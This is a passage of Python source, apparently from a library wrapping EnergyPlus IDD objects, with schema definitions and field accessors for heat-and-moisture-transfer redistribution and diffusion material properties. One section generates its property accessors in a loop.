'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 20',
{'name': u'Moisture Content 20',
'pyname': u'moisture_content_20',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 20',
{'name': u'Liquid Transport Coefficient 20',
'pyname': u'liquid_transport_coefficient_20',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 21',
{'name': u'Moisture Content 21',
'pyname': u'moisture_content_21',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 21',
{'name': u'Liquid Transport Coefficient 21',
'pyname': u'liquid_transport_coefficient_21',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 22',
{'name': u'Moisture Content 22',
'pyname': u'moisture_content_22',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 22',
{'name': u'Liquid Transport Coefficient 22',
'pyname': u'liquid_transport_coefficient_22',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 23',
{'name': u'Moisture Content 23',
'pyname': u'moisture_content_23',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 23',
{'name': u'Liquid Transport Coefficient 23',
'pyname': u'liquid_transport_coefficient_23',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 24',
{'name': u'Moisture Content 24',
'pyname': u'moisture_content_24',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 24',
{'name': u'Liquid Transport Coefficient 24',
'pyname': u'liquid_transport_coefficient_24',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'}),
(u'moisture content 25',
{'name': u'Moisture Content 25',
'pyname': u'moisture_content_25',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'liquid transport coefficient 25',
{'name': u'Liquid Transport Coefficient 25',
'pyname': u'liquid_transport_coefficient_25',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'm2/s'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 0,
'name': u'MaterialProperty:HeatAndMoistureTransfer:Redistribution',
'pyname': u'MaterialPropertyHeatAndMoistureTransferRedistribution',
'required-object': False,
'unique-object': False}
@property
def material_name(self):
    """str: IDD field `Material Name` — the moisture material the
    redistribution properties are attached to, or None if unset."""
    return self["Material Name"]

@material_name.setter
def material_name(self, value=None):
    """Set IDD field `Material Name`; ValueError if `value` is invalid."""
    self["Material Name"] = value

@property
def number_of_redistribution_points(self):
    """int: IDD field `Number of Redistribution points` — count of data
    points in the curve (valid range 1..25), or None if unset."""
    return self["Number of Redistribution points"]

@number_of_redistribution_points.setter
def number_of_redistribution_points(self, value=None):
    """Set IDD field `Number of Redistribution points`; ValueError if `value` is invalid."""
    self["Number of Redistribution points"] = value
# ------------------------------------------------------------------
# Accessors for the 25 (Moisture Content N, Liquid Transport
# Coefficient N) data-point pairs.
#
# The 100 hand-written property/setter methods this replaces were
# identical except for the field number and the unit string, so the
# properties are generated in a loop instead of being duplicated.
# Get/set behaviour is unchanged: each property delegates to
# self["<Field Name> <N>"] exactly as the original methods did, and
# each setter keeps the original `value=None` default.
#
# NOTE(review): this relies on the documented CPython behaviour that
# mutating the mapping returned by locals() inside a class body
# updates the class namespace (class bodies, unlike function bodies,
# execute over a real dict).
def _idd_field_property(field_name, units):
    """Build a read/write property delegating to self[field_name].

    Args:
        field_name (str): exact IDD field name used as the item key.
        units (str): unit string for the generated docstring only.
    Returns:
        property: accessor equivalent to the original hand-written pair.
    """
    def _get(self):
        # Mirrors the original getter: a plain item lookup.
        return self[field_name]

    def _set(self, value=None):
        # Mirrors the original setter, including the None default.
        self[field_name] = value

    _get.__doc__ = (
        "field `%s`\n"
        "| Units: %s\n"
        "Args:\n"
        "    value (float): value for IDD Field `%s`\n"
        "Raises:\n"
        "    ValueError: if `value` is not a valid value\n"
        "Returns:\n"
        "    float: the value of the field or None if not set\n"
    ) % (field_name, units, field_name)
    _set.__doc__ = "Corresponds to IDD field `%s`" % field_name
    return property(_get, _set, doc=_get.__doc__)

for _n in range(1, 26):
    locals()["moisture_content_%d" % _n] = _idd_field_property(
        "Moisture Content %d" % _n, "kg/m3")
    locals()["liquid_transport_coefficient_%d" % _n] = _idd_field_property(
        "Liquid Transport Coefficient %d" % _n, "m2/s")

# Keep the namespace clean: neither the loop index nor the factory is
# part of the public interface.
del _n
del _idd_field_property
class MaterialPropertyHeatAndMoistureTransferDiffusion(DataObject):
""" Corresponds to IDD object `MaterialProperty:HeatAndMoistureTransfer:Diffusion`
HeatBalanceAlgorithm = CombinedHeatAndMoistureFiniteElement solution algorithm only.
Relationship between water vapor diffusion and relative humidity fraction
Has no effect with other HeatBalanceAlgorithm solution algorithms
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'material name',
{'name': u'Material Name',
'pyname': u'material_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'number of data pairs',
{'name': u'Number of Data Pairs',
'pyname': u'number_of_data_pairs',
'maximum': 25,
'required-field': True,
'autosizable': False,
'minimum': 1,
'autocalculatable': False,
'type': u'integer'}),
(u'relative humidity fraction 1',
{'name': u'Relative Humidity Fraction 1',
'pyname': u'relative_humidity_fraction_1',
'maximum': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 1',
{'name': u'Water Vapor Diffusion Resistance Factor 1',
'pyname': u'water_vapor_diffusion_resistance_factor_1',
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 2',
{'name': u'Relative Humidity Fraction 2',
'pyname': u'relative_humidity_fraction_2',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 2',
{'name': u'Water Vapor Diffusion Resistance Factor 2',
'pyname': u'water_vapor_diffusion_resistance_factor_2',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 3',
{'name': u'Relative Humidity Fraction 3',
'pyname': u'relative_humidity_fraction_3',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 3',
{'name': u'Water Vapor Diffusion Resistance Factor 3',
'pyname': u'water_vapor_diffusion_resistance_factor_3',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 4',
{'name': u'Relative Humidity Fraction 4',
'pyname': u'relative_humidity_fraction_4',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 4',
{'name': u'Water Vapor Diffusion Resistance Factor 4',
'pyname': u'water_vapor_diffusion_resistance_factor_4',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 5',
{'name': u'Relative Humidity Fraction 5',
'pyname': u'relative_humidity_fraction_5',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 5',
{'name': u'Water Vapor Diffusion Resistance Factor 5',
'pyname': u'water_vapor_diffusion_resistance_factor_5',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 6',
{'name': u'Relative Humidity Fraction 6',
'pyname': u'relative_humidity_fraction_6',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 6',
{'name': u'Water Vapor Diffusion Resistance Factor 6',
'pyname': u'water_vapor_diffusion_resistance_factor_6',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 7',
{'name': u'Relative Humidity Fraction 7',
'pyname': u'relative_humidity_fraction_7',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 7',
{'name': u'Water Vapor Diffusion Resistance Factor 7',
'pyname': u'water_vapor_diffusion_resistance_factor_7',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 8',
{'name': u'Relative Humidity Fraction 8',
'pyname': u'relative_humidity_fraction_8',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 8',
{'name': u'Water Vapor Diffusion Resistance Factor 8',
'pyname': u'water_vapor_diffusion_resistance_factor_8',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 9',
{'name': u'Relative Humidity Fraction 9',
'pyname': u'relative_humidity_fraction_9',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 9',
{'name': u'Water Vapor Diffusion Resistance Factor 9',
'pyname': u'water_vapor_diffusion_resistance_factor_9',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 10',
{'name': u'Relative Humidity Fraction 10',
'pyname': u'relative_humidity_fraction_10',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 10',
{'name': u'Water Vapor Diffusion Resistance Factor 10',
'pyname': u'water_vapor_diffusion_resistance_factor_10',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 11',
{'name': u'Relative Humidity Fraction 11',
'pyname': u'relative_humidity_fraction_11',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 11',
{'name': u'Water Vapor Diffusion Resistance Factor 11',
'pyname': u'water_vapor_diffusion_resistance_factor_11',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 12',
{'name': u'Relative Humidity Fraction 12',
'pyname': u'relative_humidity_fraction_12',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 12',
{'name': u'Water Vapor Diffusion Resistance Factor 12',
'pyname': u'water_vapor_diffusion_resistance_factor_12',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 13',
{'name': u'Relative Humidity Fraction 13',
'pyname': u'relative_humidity_fraction_13',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 13',
{'name': u'Water Vapor Diffusion Resistance Factor 13',
'pyname': u'water_vapor_diffusion_resistance_factor_13',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 14',
{'name': u'Relative Humidity Fraction 14',
'pyname': u'relative_humidity_fraction_14',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 14',
{'name': u'Water Vapor Diffusion Resistance Factor 14',
'pyname': u'water_vapor_diffusion_resistance_factor_14',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 15',
{'name': u'Relative Humidity Fraction 15',
'pyname': u'relative_humidity_fraction_15',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 15',
{'name': u'Water Vapor Diffusion Resistance Factor 15',
'pyname': u'water_vapor_diffusion_resistance_factor_15',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 16',
{'name': u'Relative Humidity Fraction 16',
'pyname': u'relative_humidity_fraction_16',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 16',
{'name': u'Water Vapor Diffusion Resistance Factor 16',
'pyname': u'water_vapor_diffusion_resistance_factor_16',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 17',
{'name': u'Relative Humidity Fraction 17',
'pyname': u'relative_humidity_fraction_17',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 17',
{'name': u'Water Vapor Diffusion Resistance Factor 17',
'pyname': u'water_vapor_diffusion_resistance_factor_17',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 18',
{'name': u'Relative Humidity Fraction 18',
'pyname': u'relative_humidity_fraction_18',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 18',
{'name': u'Water Vapor Diffusion Resistance Factor 18',
'pyname': u'water_vapor_diffusion_resistance_factor_18',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 19',
{'name': u'Relative Humidity Fraction 19',
'pyname': u'relative_humidity_fraction_19',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 19',
{'name': u'Water Vapor Diffusion Resistance Factor 19',
'pyname': u'water_vapor_diffusion_resistance_factor_19',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 20',
{'name': u'Relative Humidity Fraction 20',
'pyname': u'relative_humidity_fraction_20',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 20',
{'name': u'Water Vapor Diffusion Resistance Factor 20',
'pyname': u'water_vapor_diffusion_resistance_factor_20',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 21',
{'name': u'Relative Humidity Fraction 21',
'pyname': u'relative_humidity_fraction_21',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 21',
{'name': u'Water Vapor Diffusion Resistance Factor 21',
'pyname': u'water_vapor_diffusion_resistance_factor_21',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 22',
{'name': u'Relative Humidity Fraction 22',
'pyname': u'relative_humidity_fraction_22',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 22',
{'name': u'Water Vapor Diffusion Resistance Factor 22',
'pyname': u'water_vapor_diffusion_resistance_factor_22',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 23',
{'name': u'Relative Humidity Fraction 23',
'pyname': u'relative_humidity_fraction_23',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 23',
{'name': u'Water Vapor Diffusion Resistance Factor 23',
'pyname': u'water_vapor_diffusion_resistance_factor_23',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 24',
{'name': u'Relative Humidity Fraction 24',
'pyname': u'relative_humidity_fraction_24',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 24',
{'name': u'Water Vapor Diffusion Resistance Factor 24',
'pyname': u'water_vapor_diffusion_resistance_factor_24',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'relative humidity fraction 25',
{'name': u'Relative Humidity Fraction 25',
'pyname': u'relative_humidity_fraction_25',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'}),
(u'water vapor diffusion resistance factor 25',
{'name': u'Water Vapor Diffusion Resistance Factor 25',
'pyname': u'water_vapor_diffusion_resistance_factor_25',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'dimensionless'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 0,
'name': u'MaterialProperty:HeatAndMoistureTransfer:Diffusion',
'pyname': u'MaterialPropertyHeatAndMoistureTransferDiffusion',
'required-object': False,
'unique-object': False}
@property
def material_name(self):
"""field `Material Name`
| Moisture Material Name that the moisture properties will be added to.
Args:
value (str): value for IDD Field `Material Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `material_name` or None if not set
"""
return self["Material Name"]
@material_name.setter
def material_name(self, value=None):
"""Corresponds to IDD field `Material Name`"""
self["Material Name"] = value
@property
def number_of_data_pairs(self):
"""field `Number of Data Pairs`
| Water Vapor Diffusion Resistance Factor
| value >= 1
| value <= 25
Args:
value (int): value for IDD Field `Number of Data Pairs`
Raises:
ValueError: if `value` is not a valid value
Returns:
int: the value of `number_of_data_pairs` or None if not set
"""
return self["Number of Data Pairs"]
@number_of_data_pairs.setter
def number_of_data_pairs(self, value=None):
"""Corresponds to IDD field `Number of Data Pairs`"""
self["Number of Data Pairs"] = value
@property
def relative_humidity_fraction_1(self):
"""field `Relative Humidity Fraction 1`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 1`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_1` or None if not set
"""
return self["Relative Humidity Fraction 1"]
@relative_humidity_fraction_1.setter
def relative_humidity_fraction_1(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 1`"""
self["Relative Humidity Fraction 1"] = value
@property
def water_vapor_diffusion_resistance_factor_1(self):
"""field `Water Vapor Diffusion Resistance Factor 1`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 1`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_1` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 1"]
@water_vapor_diffusion_resistance_factor_1.setter
def water_vapor_diffusion_resistance_factor_1(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
1`"""
self["Water Vapor Diffusion Resistance Factor 1"] = value
@property
def relative_humidity_fraction_2(self):
"""field `Relative Humidity Fraction 2`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 2`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_2` or None if not set
"""
return self["Relative Humidity Fraction 2"]
@relative_humidity_fraction_2.setter
def relative_humidity_fraction_2(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 2`"""
self["Relative Humidity Fraction 2"] = value
@property
def water_vapor_diffusion_resistance_factor_2(self):
"""field `Water Vapor Diffusion Resistance Factor 2`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 2`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_2` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 2"]
@water_vapor_diffusion_resistance_factor_2.setter
def water_vapor_diffusion_resistance_factor_2(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
2`"""
self["Water Vapor Diffusion Resistance Factor 2"] = value
@property
def relative_humidity_fraction_3(self):
"""field `Relative Humidity Fraction 3`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 3`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_3` or None if not set
"""
return self["Relative Humidity Fraction 3"]
@relative_humidity_fraction_3.setter
def relative_humidity_fraction_3(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 3`"""
self["Relative Humidity Fraction 3"] = value
@property
def water_vapor_diffusion_resistance_factor_3(self):
"""field `Water Vapor Diffusion Resistance Factor 3`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 3`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_3` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 3"]
@water_vapor_diffusion_resistance_factor_3.setter
def water_vapor_diffusion_resistance_factor_3(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
3`"""
self["Water Vapor Diffusion Resistance Factor 3"] = value
@property
def relative_humidity_fraction_4(self):
"""field `Relative Humidity Fraction 4`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 4`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_4` or None if not set
"""
return self["Relative Humidity Fraction 4"]
@relative_humidity_fraction_4.setter
def relative_humidity_fraction_4(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 4`"""
self["Relative Humidity Fraction 4"] = value
@property
def water_vapor_diffusion_resistance_factor_4(self):
"""field `Water Vapor Diffusion Resistance Factor 4`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 4`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_4` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 4"]
@water_vapor_diffusion_resistance_factor_4.setter
def water_vapor_diffusion_resistance_factor_4(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
4`"""
self["Water Vapor Diffusion Resistance Factor 4"] = value
@property
def relative_humidity_fraction_5(self):
"""field `Relative Humidity Fraction 5`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 5`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_5` or None if not set
"""
return self["Relative Humidity Fraction 5"]
@relative_humidity_fraction_5.setter
def relative_humidity_fraction_5(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 5`"""
self["Relative Humidity Fraction 5"] = value
@property
def water_vapor_diffusion_resistance_factor_5(self):
"""field `Water Vapor Diffusion Resistance Factor 5`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 5`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_5` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 5"]
@water_vapor_diffusion_resistance_factor_5.setter
def water_vapor_diffusion_resistance_factor_5(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
5`"""
self["Water Vapor Diffusion Resistance Factor 5"] = value
@property
def relative_humidity_fraction_6(self):
"""field `Relative Humidity Fraction 6`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 6`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_6` or None if not set
"""
return self["Relative Humidity Fraction 6"]
@relative_humidity_fraction_6.setter
def relative_humidity_fraction_6(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 6`"""
self["Relative Humidity Fraction 6"] = value
@property
def water_vapor_diffusion_resistance_factor_6(self):
"""field `Water Vapor Diffusion Resistance Factor 6`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 6`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_6` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 6"]
@water_vapor_diffusion_resistance_factor_6.setter
def water_vapor_diffusion_resistance_factor_6(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
6`"""
self["Water Vapor Diffusion Resistance Factor 6"] = value
@property
def relative_humidity_fraction_7(self):
"""field `Relative Humidity Fraction 7`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 7`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_7` or None if not set
"""
return self["Relative Humidity Fraction 7"]
@relative_humidity_fraction_7.setter
def relative_humidity_fraction_7(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 7`"""
self["Relative Humidity Fraction 7"] = value
@property
def water_vapor_diffusion_resistance_factor_7(self):
"""field `Water Vapor Diffusion Resistance Factor 7`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 7`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_7` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 7"]
@water_vapor_diffusion_resistance_factor_7.setter
def water_vapor_diffusion_resistance_factor_7(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
7`"""
self["Water Vapor Diffusion Resistance Factor 7"] = value
@property
def relative_humidity_fraction_8(self):
"""field `Relative Humidity Fraction 8`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 8`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_8` or None if not set
"""
return self["Relative Humidity Fraction 8"]
@relative_humidity_fraction_8.setter
def relative_humidity_fraction_8(self, value=None):
"""Corresponds to IDD field `Relative Humidity Fraction 8`"""
self["Relative Humidity Fraction 8"] = value
@property
def water_vapor_diffusion_resistance_factor_8(self):
"""field `Water Vapor Diffusion Resistance Factor 8`
| Units: dimensionless
Args:
value (float): value for IDD Field `Water Vapor Diffusion Resistance Factor 8`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `water_vapor_diffusion_resistance_factor_8` or None if not set
"""
return self["Water Vapor Diffusion Resistance Factor 8"]
@water_vapor_diffusion_resistance_factor_8.setter
def water_vapor_diffusion_resistance_factor_8(self, value=None):
"""Corresponds to IDD field `Water Vapor Diffusion Resistance Factor
8`"""
self["Water Vapor Diffusion Resistance Factor 8"] = value
@property
def relative_humidity_fraction_9(self):
"""field `Relative Humidity Fraction 9`
| The relative humidity is entered as a fraction.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Relative Humidity Fraction 9`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `relative_humidity_fraction_9` or None if not set
"""
return self["Relative Humidity Fraction 9"]
@relative_humidity_fraction_9.setter
